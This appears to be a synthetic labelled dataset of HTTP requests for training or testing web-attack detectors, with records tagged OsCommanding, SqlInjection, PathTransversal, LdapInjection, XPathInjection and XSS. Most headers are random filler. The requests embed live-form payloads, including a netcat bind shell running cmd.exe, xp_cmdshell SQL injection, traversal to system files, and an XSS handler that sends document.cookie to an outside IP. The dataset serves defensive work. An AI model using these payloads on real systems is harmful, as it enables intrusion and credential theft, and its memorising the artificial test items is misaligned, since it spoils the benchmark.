If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Tue, 26 Jul 05 05:33:33 UTC
Max-Forwards: 4692
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: Basic YndhdmZiOjV5d2lr
Range: 36-,-7
Referer: http://lm9abqt.be/5e4jiaua/3tpa9te.bin
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.4 (Windows; U; Win98 4.8; bn-6l; rv:6.7.4) Gecko/37414556
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 223x382
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

blsaePennrl=qouAn9eqasah&hq5L4aegji6=aymicarn9tthWo&nfia=nQ7(lbhaa&eniro9neeeo=Eos)(&(objectClass  =jI*)&wmRapedtUietp=938&hofir0leGee=bgsoundAkgNemyotfteinputo&j3yOsit=5047951&dso=326&@PzN0qT6YUoO=alFnTdGxpOw

End - Id: 37572
Start - Id: 42836
class: OsCommanding
GET /niJjoI/vups.tiff?atameafseboqvw=neowiawo&m6a1usto=byv&snoae=h%5CvveS%5DtrnEo&thSpyljL89oU=eno8c%5Ceeem&8lhtpass@Es.@dAna=ycu&id9wu4vuty6t7h=e%7Cqr&Mzq5.TczonH=%7C+++shell%28+++++%22cmd+++%2Fc++c%3AInetpubwwwrootMSISSnc.exe++-l++++-p+0241+++-t++++-e+++cmd.exe+%22+%29+++++%7C++%27&6uafrcYrnor=924&1RarleopdnoTyh=m%40q.&sue=4924080408&requ2jeottdte=59942&eatkraepi5utri=781541&piuer0allrchfa=1aayh HTTP/1.1
Host: www.norbe3lr6.cz
Connection: close
Accept: text/xml
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: asf-9oroeUeG, f0g5mh-hetEh;q=0.9, oa-ecdo;q=0.2
Cache-Control: hjaAui=dt5eRSk6
Client-ip: 129.42.74.202
Cookie: 07null-execMA4LHZ=sp0<sa
Date: Mon, 13 Dec 04 20:04:17 GMT
ETag: "pei1_qWjREV5RDdbfc"
Expect: 2iteirO
From: otsveiea@oarDol.com
If-Modified-Since: Wed, 11 Mar 09 24:33:52 CET
If-Unmodified-Since: Sat, 29 Mar 08 17:37:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8717
MIME-Version: 7.9
Pragma: gljue=Tsle
Authorization: Basic b25kdHRhOmUwbmk5aGg=
Range: -885,-18051
Referer: /icnacan6/erewkeR/rela8.mdb
TE: trailers,chunked
Trailer: Host
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 8.9; hh-bT; rv:2.3.2) Gecko/80826139
UA-CPU: StrongARM
UA-Disp: 1330,7116,16
UA-Color: color32
Via: 8.7 www.setwrd.htm, 5.5 235.139.124.124, 3.2 186.153.249.112:46478
Transfer-Encoding: oye5c
Upgrade: NhTeWO/2.9, teisee/0.9
Warning: 486 www.rdh6C.png "4etoee9t6tRto" 
X-Forwarded-For: 209.98.157.41
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 42836
Start - Id: 36013
class: PathTransversal
GET /ssI4BM-vFA6Nl@EAQ0y/teQhqnIE5id/z1IX1a/s76lgFjbm7pTQjE@uIr6/tyS7efidre/pkayJx.css?lLVB=749667&rrnusl=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&pU1k=%7ChtrtSenph-a4jrie3&cd=+Oi2&Dge=1275434&er0tsm4et8360r=0507148&bnea0sePte=2qC2-wTjol&an7aftnq=khynshhHn&set=ichildi&oipadvi7m5be=snl4z&Tt=u9&b1uWbreyqh=%251thtadecjrhomefohe4ent&phmlGeeadsneht=hlatriNO9tu&SiaweDtty=tseld HTTP/1.0
Host: www.vi5n8eIh.com
Connection: Hchtee
Accept: text/*, text/*
Accept-Encoding: 
Accept-Language: yg-ta, urtal-eAOnova, dsniSp-qeh;q=0.2
Cache-Control: only-if-cached
Cookie: rbxepnbztteeee=0hehmwriVe6aHi;jaajAeEl=9855173220;yehniun=s;InupdatekliZd1XeK=ro 1;gyne=hAh6Ssp;eat=3kt
Date: Thu, 19 Oct 06 05:52:44 GMT
If-Unmodified-Since: Tue, 18 Oct 05 23:42:42 CET
If-None-Match: *
MIME-Version: 9.9
Authorization: tbnei oiec=eotufe
Referer: http://www.ilix.gov/hn9dgS/etlti.msf
TE: trailers,trailers
User-Agent: oreglatealrh
Via: FTP/1.1 116.127.209.75, wtesk/0.1 www.dtoimob.png, 0.0 www.otmFnawr.tiff

null

End - Id: 36013
Start - Id: 40998
class: SqlInjection
POST /tI/0a5W56tf8d/sK_rd/VKB0.RyS/@e5EjvbscriptJWBdropT/oRJR19lbAHjlwaukD8q/i1/1z/bVTpsxK4bI7Fs544b/t2/KbEJGzKYWbodyy8.js? HTTP/1.1
Content-Length: 296
Content-Language: Oucy,ettampo
Content-Encoding: deflate
Content-Location: /1Lwn/2iii/hWht0Sa.nsf
Content-MD5: cnN5TmN1ZmhndHNvaWxwZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Aug 06 01:54:52 UTC
Last-Modified: Wed, 21 Mar 07 22:41:58 CET
Host: www.Crerlctre.de:80
Connection: rcoEbc7o
Accept: text/*;q=0.4, video/*;q=0.4
Accept-Charset: koi8, x-mac-chinesetrad;q=0.7
Accept-Encoding: deflate, identity;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 248.121.203.33
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="889"
Date: Sun, 28 Feb 10 03:55:57 CET
ETag: "vXvN5UnvPs4m@hSmv5"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Sun, 28 Mar 10 11:13:36 GMT
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Mon, 21 Dec 09 22:13:53 GMT
Max-Forwards: 975
MIME-Version: 8.3
Authorization: 9etso itrab=ohxvo2N
Referer: /ehfj/ebrt/svtg2/hsiYmt/ftet.exe
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 3.8; 4o-sd; rv:6.1.9) Gecko/15261259
UA-Pixels: 892x2342
Via: 9.5 211.185.137.236
Transfer-Encoding: gzip
X-Forwarded-For: 181.40.75.124

ERk3=n6olpbirifohaauv&nz7=scriptahtaccesaT&fhfhnelifeo=';EXECmaster.dbo.xp_cmdshell'cmd.exe&eRCtseZnry=bwmsFi&ttr=fs+&wteoEnuwrvz3=t3aN5nRw&6uhyhhteghlnlfA=hcAnEoi&TMSIqPeNBsusrw=dc/o7&eyrloy=184&homelUmscript_=ehe&rnboheh=4%uNl=cs Imaili44adminhvk&mfneERahltlcea=3723&VjoaoEtmYat=s

End - Id: 40998
Start - Id: 37459
class: LdapInjection
GET /en3fBThNHpGnL4PUvJL/Oues/dc9s9sDODgzhCWj/aiigvENetoeyaEt/nc1t/l5KiBURu58B/-./b6y3QW/pUwr_dKAhttpsYANb/tzApYnulQQULG_-lc/ztcf7oosy/yrONtiiqess02ledao.dll?iaeud2tm=4&olMgEltikaejnE4=nKT&hdATiwbetTlOvnw=hntgyris&dhejcnwea0N=608385965&Ilnzlewetb7=oq%5Cand&a0Pdzq=a7Y&isq5spO=ulygo&RaPUZGt@fXfs=Bca&fbouip=egRxtilhgaa5tsr&KB9DmHr=iye&i01r=apmDJT-Kk8t&4peoWx=nlnlc%24eP+saTha HTTP/1.1
Host: 171.69.102.105
Connection: utia
Accept: video/*, video/mpeg;q=0.8
Accept-Charset: windows-1253;q=0.7, iso-8859-4, iso-2022-jp;q=0.5
Accept-Encoding: compress;q=0.6, deflate;q=0.2, compress;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 212.186.34.75
Cookie: .TvbscriptOH29NYqB=arbc8ttcotitta;nc9inf0=w;aecmund2eehbir=mhoedW6rmA'+nxo03(>tmp;ecmht3Nlt=iDheitbse;e4U6aE=)    (    |  (   cn=*o  'brien* )(mail    =*o 'brien*    )
Cookie2: $Version="4"
Date: Mon, 01 May 06 19:42:47 UTC
ETag: "7LPqAEUy8kOfSzzOQ"
Expect: r3ee3
From: rOjoxac4@o2cz.biz
If-Modified-Since: Fri, 22 Jul 05 21:31:13 CET
If-Unmodified-Since: Sat, 20 Mar 10 01:43:39 CET
If-Match: "Oev.ZW7OJz6UYr6"
If-None-Match: "1nbzqhFAptB@7R2nH1"
If-Range: *
Max-Forwards: 18
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest qop=taae
Authorization: Basic c3RnZjJsdDg6Q2VocjdleXY=
Range: 0504-,-286
Referer: http://5y7eueel.biz/2seef/w235gty/yz2n.mp3
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.1 (Windows; U; WinNT 6.7; le-lG; rv:8.3.6) Gecko/52845181
UA-CPU: MIPS
UA-Disp: 0368,0214,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 161x1713
Via: 5.7 79.66.176.146:8, 2.1 104.75.189.6:0363, 6.7 www.e8anegoe.js
Transfer-Encoding: an2dtt; elana6=Oujc
Upgrade: Iatih/1.1, bmls/3.7, alei/8.7, uapp/9.5
Warning: 886 5.35.222.218 "heval7tanRnTas" "Mon, 03 Jul 06 13:38:22 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37459
Start - Id: 44206
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.lhi8gUac.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 58.77.18.243
Cookie: mwoZ=ni+&rajieyrconnectbody;SorJ=iAinPs>psscript;xeere=o;21ePq6ye=q)9a
Cookie2: $Version="370"
Date: Wed, 30 Aug 06 17:03:13 CET
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sun, 26 Nov 06 05:28:15 CET
If-Unmodified-Since: Wed, 16 Mar 05 17:13:38 CET
If-Match: *
If-None-Match: *
If-Range: "d@c@y9vnj9R@FcJY-V"
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM bzVubnBydDRhcmFnZXFsdWUyaHRyb2ZsaTM1bmFDYzl0
Authorization: 9w0nEe Hqmzed=bebg
Range: 808-
Referer: /2dee/hfcitoe/nnKt/Adsahii/l0nY5oH.js
TE: trailers,gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: e5DntNt
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: HTTP/8.7 www.1Tto1o.css:96155
Transfer-Encoding: identity
Upgrade: FsT/8.7
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44206
Start - Id: 42906
class: OsCommanding
PUT /iBbGmpRs3Tluvc.gif? HTTP/1.0
Content-Length: 97
Content-Language: tve,eergaut
Content-Encoding: deflate
Content-Location: http://io1ln.de/talxf.php3
Content-MD5: YWVuaGVlcGhhc3JuYXVlOQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 16 Oct 04 05:26:19 UTC
Host: 151.139.114.108
Connection: nuo9tss
Accept: audio/*;q=0.1
Accept-Charset: windows-1251, windows-1252, iso-8859-1;q=0.9, euc-kr, macintosh;q=0.8
Accept-Encoding: 116.177.175.44 | cmd.exe /s
Accept-Language: itsd-D2hj
Cache-Control: Alx='r'
Cookie2: $Version="59"
Date: Mon, 28 Sep 09 16:39:26 CET
Expect: 0cdw8=Aest
If-Unmodified-Since: Mon, 11 Apr 05 06:06:31 CET
If-Match: *
Max-Forwards: 691
Pragma: dinsis='0t'
Proxy-Authorization: NTLM TWF0Zm9yb2Z3ZWVocmgwQ2VhbnJPc3UwaUJpdE9FZWVubGVnN29vYWlpbnRn
Authorization: Digest nc=C494d1ce
Referer: /oEGnaa.gz
TE: trailers
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 8.6; df-sr; rv:1.6.4) Gecko/06740727
UA-Disp: 4611,5463,8
Via: 5.7 74.16.107.56
Transfer-Encoding: pnr5r; sueor=snhidmk
----: ---------------------

C5qOZ4xmlJxjA=39508832&e7EEnsElcyirv=964046&Q@jscriptjcopyS_=5465478980&hezfwfrsanco=r51Vzr45J0rZ

End - Id: 42906
Start - Id: 46252
class: PathTransversal
GET /muirt/aWA5jUquRd8/9a2ibsrrjiNstsiu/2styleQuMZ4OW.html?toneyxiu=boot.inidzebTwruoaE&oaboot.iniba12ZlMrxml=743576&yGX9Winput=OtT2udz&cres9inypl=SIusrformaseLpxdt&ws=uautoexec&g3oqistsf=Oz&a7naex=%2Fetc%2Fhttpd%2Fhttpd.conf&i360ai1gPj=nhis2%24fcopymsria&pd3s=5xHRalEmkhlosfw HTTP/1.1
Host: www.AtMedht.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.9, x-mac-chinesetrad;q=0.4, shift_jis;q=0.3, iso-8859-6;q=0.0
Accept-Encoding: compress;q=0.1
Accept-Language: tp3-rrNmA1;q=0.0, ahntFtnr-tfBba4d;q=0.5, cde-teEgnad, icn-nTh
Cache-Control: min-fresh=96141
Client-ip: 65.148.210.30
Cookie: i4xoi=5357;hrt=945954;1txNrncsk4=ie<lexechavinghavingsdmQeed
Cookie2: $Version="22"
Date: Fri, 12 Oct 07 11:08:18 CET
ETag: W/"AOGc4hZaHgvkHRS"
Expect: 100-continue
From: iervv@usohuics.gov
If-Modified-Since: Tue, 12 Apr 05 08:13:01 UTC
If-Unmodified-Since: Fri, 23 Dec 05 14:47:22 GMT
If-Match: "HLXMtC0SFhJ_0vM"
If-None-Match: *
If-Range: Sun, 22 Jul 07 03:13:40 GMT
Max-Forwards: 8101
MIME-Version: 9.7
Pragma: Rtq=em7i
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Basic dG9tYzphaG52
Range: 5263-
Referer: http://logala.de/adoriwt.asp
TE: gzip
Trailer: If-Modified-Since
User-Agent: sKheKp52 http://www.rrKu.fr
UA-CPU: 68000
UA-Disp: 2962,786,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: FTP/9.3 230.63.39.148, 7.0 97.126.93.175, FTP/3.9 www.o2ho.css:662
Transfer-Encoding: deflate
Upgrade: roeie/1.4
Warning: 233 www.yens9.gif "cesksyo" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46252
Start - Id: 48737
class: XPathInjection
GET /arIn5BPqNKJnzyr-/u9xIrhsP.msf?mdEakaYhsorrci=raeEt5Ash&npedoloouToAEn=53188&sseepeeB6ra=aM6%27+++++or+%28i+++++%3C+++++count%28ii%2Fchild%3A%3Atext%28%29%29+and++j+++%3C++++count%28ndar%2Fchild%3A%3Acomment%28%29%29+++++and+++++k++++%3C++count%28Seace%2Fchild%3A%3A*%29+%29+++or++++%27oeNIeTv%27%3D++%27+f3lu%27++or&niha5Yau9ttr=4&I7i=82&aoTee=suo&eplncfnPTru=fy3ht&dSe=%7Cm%27uusrhomevae%27cih+ndin&rtnonefheedid=6502578&8cv5wuDSys=Btmeqs2EcnqiAs&rtxioeno8=eVAA6.L&odcEp=ua5rcpi&cnoinh0=eNu&bso60netadr=usat HTTP/1.1
Host: 241.217.253.107:80
Connection: keep-alive
Accept: text/xml;q=0.0, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=31
Client-ip: 80.135.128.144
Cookie: atHhdoUme=Teieeamind;SorM=i;oe3otI9nMwi=105;58IGPxD5MsU=sbo;hmNslm=marr3he;rajtlsaosntaiAe=rE z
Cookie2: $Version="20"
Date: Fri, 13 Aug 04 23:10:51 UTC
ETag: W/"K9qtuGj_MBzd3YVA"
Expect: fonrex
From: wdlEt@aLnyEae.st
If-Modified-Since: Sun, 25 Sep 05 11:35:52 GMT
If-Unmodified-Since: Tue, 30 Jun 09 22:10:07 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: *
Max-Forwards: 60
MIME-Version: 1.5
Pragma: 5qwtxct=nv
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM aGJsamljdHJlcHRsZ0hpbmRlZG5lZXNldG9mYWVvdmFySQ==
Range: 328-,-79624
Referer: /oesu2amS.swf
TE: deflate;q=0.6,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.4 (Windows; U; Win98 0.6; ne-ot; rv:2.6.5) Gecko/85651740
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 1.7 222.64.33.192, 6.7 www.hpy7al4.jpg
Transfer-Encoding: gzip
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 73.30.104.44
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48737
Start - Id: 48260
class: XSS
PUT /DZFUYdocumenttKq/dfd/7oeroriLlimgex/nHakONH8scIppmbTLBP6.asmx? HTTP/1.0
Content-Length: 102
Content-Language: n
Content-Encoding: compress
Content-Location: /Caig.gif
Content-MD5: dXhsc2dlam5qMHJlc21vcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 08:20:06 GMT
Last-Modified: Mon, 17 Sep 07 05:59:33 GMT
Host: 156.23.0.117:80
Connection: keep-alive
Accept: application/rtf, video/*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, compress, gzip, identity, identity;q=0.7
Accept-Language: tfotd-dml;q=0.9, p-ed9hhod, a7uh-w, a6r-sbeirt8n, mo-iBner
Cache-Control: no-transform
Client-ip: 194.108.155.40
Cookie: dasd=<img     src =   "    de   >  "     onmouseover="  [window.open('http://247.79.202.243/ertrtr.pl'+document.cookie);]  " >;EQimgdDKmeta7F=dhtAoytlb;itc50oiooiIoa=cuodoecto;ery7ogxal4wids=eixtwhereott amed
Cookie2: $Version="016"
Date: Tue, 04 Nov 08 15:19:38 UTC
ETag: "t1wgj5x.CnsXw7Kg."
Expect: eciai=r9uee
From: astmd@urn3eltYo.fr
If-Modified-Since: Mon, 28 Jun 04 04:03:07 CET
If-Unmodified-Since: Wed, 15 Mar 06 11:18:00 GMT
If-Match: *
If-None-Match: "Qrob@1_U3P9WuH05Auq7"
If-Range: Sun, 10 Apr 05 18:20:26 GMT
Max-Forwards: 0
Pragma: 2s=ttiw
Proxy-Authorization: NTLM em1mb2hDUnJlWmU3Z2FzaWtjcHRUbzJ0NXVzem9iaXM=
Authorization: NTLM dG5zZXUxc2luZnRicjd0TGx2dGl0dXNtc24ydmF2cmly
Range: 213803-57,-7
Referer: /xrusa.bin
TE: gzip,gzip;q=0.2
Trailer: If-Match
User-Agent: y6nertasc (yIMO1Muu; dmCxaG; 9@_NG1MALc; a8ZVjD0n; q9OGnWe)
UA-CPU: Sparc
UA-Pixels: 9755x524
Via: 8.8 www.q77bs.jpg, FTP/8.5 205.229.231.40, 6.2 74.123.239.118
X-Serial-Number: 64409334
----: ---------------------------------------------

pa=tdhnsia&L4ZT==ula?Rs&tnYh9o=18&ietoqhcntotth=458415&tnoednv=sGM1yxeHmB_e&heD=09475&snm5thl=nas 

End - Id: 48260
Start - Id: 35347
class: SqlInjection
GET /t8JS6fDPIp_HCi/srwE9QE/osr5hazT5actIt/ma/khddgsErsta2w/css/ZLNB4G12/meHZ/TEBaccess_loggz1.XGk/6JIjobjectid0sZTLc/cmwgyZJ2K/rCRMw.asp?iohsenasNen=4023&aa=+++OR+++++2+++%3E++++1 HTTP/1.0
Host: www.cnoeiai.com:80
Connection: close
Accept: video/*, image/*, text/html
Accept-Charset: iso-10646-ucs-2, koi8-r;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=24
Client-ip: 109.249.213.197
Cookie: nrutcnnUr=2;YJUn0ROQxmlA_O=t  
Cookie2: $Version="2"
Date: Thu, 17 Sep 09 03:39:13 CET
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: senlwad
From: s1wji5ah@eWWEiNhsrw.de
If-Modified-Since: Fri, 04 Mar 05 20:17:42 UTC
If-Unmodified-Since: Sat, 28 May 05 18:50:44 UTC
If-Match: "Y.qbUygtr7Gl86QcjZoT"
If-None-Match: "RUag9HAsGUH7mz9p8"
If-Range: Sun, 31 May 09 02:05:32 GMT
Max-Forwards: 7
MIME-Version: 4.3
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: emdr 68oa=f1Osdlet
Range: 1609-18413
Referer: /tmuiie/oSos/8e0iw651/oultgae/re5xuroY.gif
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 9.4; eg-aa; rv:0.5.7) Gecko/65940667
UA-CPU: 68000
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: 4.0 56.13.232.214
Transfer-Encoding: mders; TbNmenna=aset
Upgrade: ohz/1.8
Warning: 990 www.iarai.html:3656 "ttstnoOdn" "Mon, 11 Sep 06 03:23:34 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35347
Start - Id: 45448
class: PathTransversal
GET /lmo2F.T/enit/QGeval/rv/kpPmK3sYU4huXuvT07.exe?eIaqInnoop=eia0a&rfi68oizare=eRiIarsrlp2tsohey&9ecg=e5lozEsoaeeuit8c&e4w4kgkSv=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&iurnzauet7i0=ret5DKZLhpDu&daTaok8zb=ren&hdT1sar7=329094&cesspsoa=o%40%3Aeeturx&ncSdMjLupe7zX=d0S9V93UeY&mnpsehee=sl5AH_Aojso&ak=teavbscripttrrgroup+byde%5Drlaprocessing-instruction HTTP/1.1
Host: www.haFteDT.fr:80
Connection: keep-alive
Accept: video/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lteczar-teroh;q=0.4, scteIe-s9gmds;q=0.6, Sew-sTit;q=0.8
Cache-Control: max-age=700
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Sat, 11 Apr 09 16:50:41 UTC
If-Modified-Since: Mon, 19 Jan 04 10:38:33 CET
If-Unmodified-Since: Sun, 04 Oct 09 11:19:01 UTC
If-Match: *
If-None-Match: "N4jMZwqNgiTMlIPp"
If-Range: Mon, 05 Sep 05 04:03:44 UTC
Max-Forwards: 04
Pragma: sunhahaa=bie
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: nsdv ile3nao=dlotitcy
Range: -8
Referer: http://ld2h3r.com/ahdysEb/Apeyee/suaagam/qhbnqea/onemptu.fgf
TE: trailers,deflate;q=0.4,chunked
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 2.5; xi-ih; rv:3.6.3) Gecko/73935434
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
Via: 6.5 www.oaZ6aa.shtml:467, 5.1 www.hsoHnt.jpg, 9.2 232.228.101.60
Transfer-Encoding: compress
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
X-Forwarded-For: 176.191.17.103
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45448
Start - Id: 48724
class: XPathInjection
GET /uLEJQbTedlaeUT/a0vtN/5baDnu.gif?3lteaaps5=3371541555&Unvbscript4RlQPpassthruLobject=pIvc9LILz&80kee4u3=iSp&1cX70@lFfS=%2FbtDLhr&h8s0olekpieni6j=eperloaidcautoexeca%24%5BEnB&iyTs6p=374353&OiebnMHdnoccr=tBee&yppstssaee=ueYaaul%27+or+++++sle%2Fycey%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D763%5D++or++%274ois%27++%3D++++%27 HTTP/1.1
Host: www.osedtIl0.com
Connection: Xkt0g
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: ruln='yrOaii'
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="515"
Date: Tue, 16 May 06 08:36:03 UTC
ETag: W/"yhMn62dM5xWKyaoz2U"
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "64zyvjsPckrXO3F_1xh"
If-None-Match: "UIvXUmKDvcou2a2u37H"
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 5095
Pragma: no-cache
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Basic dGVFZTppa3U5aA==
Range: 7-577073
Referer: http://5loeS5.ch/pcssh.dll
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/4.8 (compatible; roqqsSId; Windows NT; arlT; tesde5dsu)
UA-CPU: MIPS
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: 5.3 www.soee6.css, 6.0 www.ias37.htm:27556, 8.9 216.130.176.160
Transfer-Encoding: gzip
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48724
Start - Id: 36664
class: OsCommanding
GET /q5o4osttrrEeoauyhe/thXp1lV.tiff?rEz=136.252.229.135++++%7C+dir%2Bc%3A%5C HTTP/1.1
Host: 10.246.204.7
Connection: u9ytobEd
Accept: video/*;q=0.4, application/*;q=0.5, image/jpeg;q=0.9
Accept-Charset: iso-8859-5;q=0.3, us-ascii;q=0.6, x-mac-arabic;q=0.6, macintosh;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 98.172.136.119
Cookie: osyiEm1a=dei;9urjub9icyto=080;Dercarn9o2anr=18;po7iDeiraPrer=769
Cookie2: $Version="9"
Date: Thu, 27 Aug 09 16:32:44 UTC
Expect: rfiaha
If-Modified-Since: Thu, 12 Oct 06 23:25:53 CET
If-Unmodified-Since: Mon, 01 Mar 10 10:39:29 CET
If-Match: *
If-None-Match: "1kjXOhM4XgLbvaHQx"
If-Range: Thu, 01 Apr 04 12:13:19 UTC
Max-Forwards: 08
Pragma: ba87i=nihaea
Authorization: Basic aW5saHNmczplMU81
Range: 937140-88792,509-
Referer: /slasntoo/dqdo78/rabwed/nuclxs/caat.php
Trailer: Host
User-Agent: leDetwwcebo
Via: e7ozo/7.2 www.e96dtow.shtml:441
Warning: 660 www.iBaqr.jpeg "5ORlnh5fsrPedhIie" "Tue, 25 Oct 05 23:59:57 GMT"
X-Forwarded-For: 203.249.198.130
----: ------------

null

End - Id: 36664
Start - Id: 37361
class: LdapInjection
GET /denkYRw7ZDAb/naieTtd23/xm39eS5DiUIIF-X5Y-Tl/eVzh/ete/sOGH6o-UhHz/4lnytRpotdz/a2NJf0_IAimP4XRPr/rrsjyQWPiY7XbR7THE.php?r6nbhAf=865&geereNtncuhn=ron&KistyleIwiframe@9=mtyiy5doR&e7g=rN&0olkfdctcl1o=apendtiieree5Ej&neoas8ntk2eh=lFzTqOqufU&F-h2P51gyJO=dn94Asm&0e7a=bl44ser&HDJN=CkLonia%3E%3B%3EebeT%2Fi+%2Bn&homerHg=63&nsqen=7922520&iOlhllm=G%27aW%29s%3Aad&lenealHoi=tzt2&ereeovxin6d=5&CstS8nh=505012 HTTP/1.0
Host: www.aethA.st:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1252;q=0.8, iso-2022-jp, x-mac-ce, windows-1252
Accept-Encoding: ) (    |    ( cn=*o    'brien*  )(mail =*o  'brien* )    
Accept-Language: *;q=0.7
Cache-Control: eri='zF'
Client-ip: 216.36.17.3
Cookie: ao=odxwcpo9;lcn=6;hllucntnhtebe=ahqtn1itictUu;1men=ifk'shlRetc=8Tr0
Cookie2: $Version="89"
Date: Sun, 02 Aug 09 22:47:17 GMT
ETag: W/"1sErXqkCyucdByw"
Expect: dlbmij
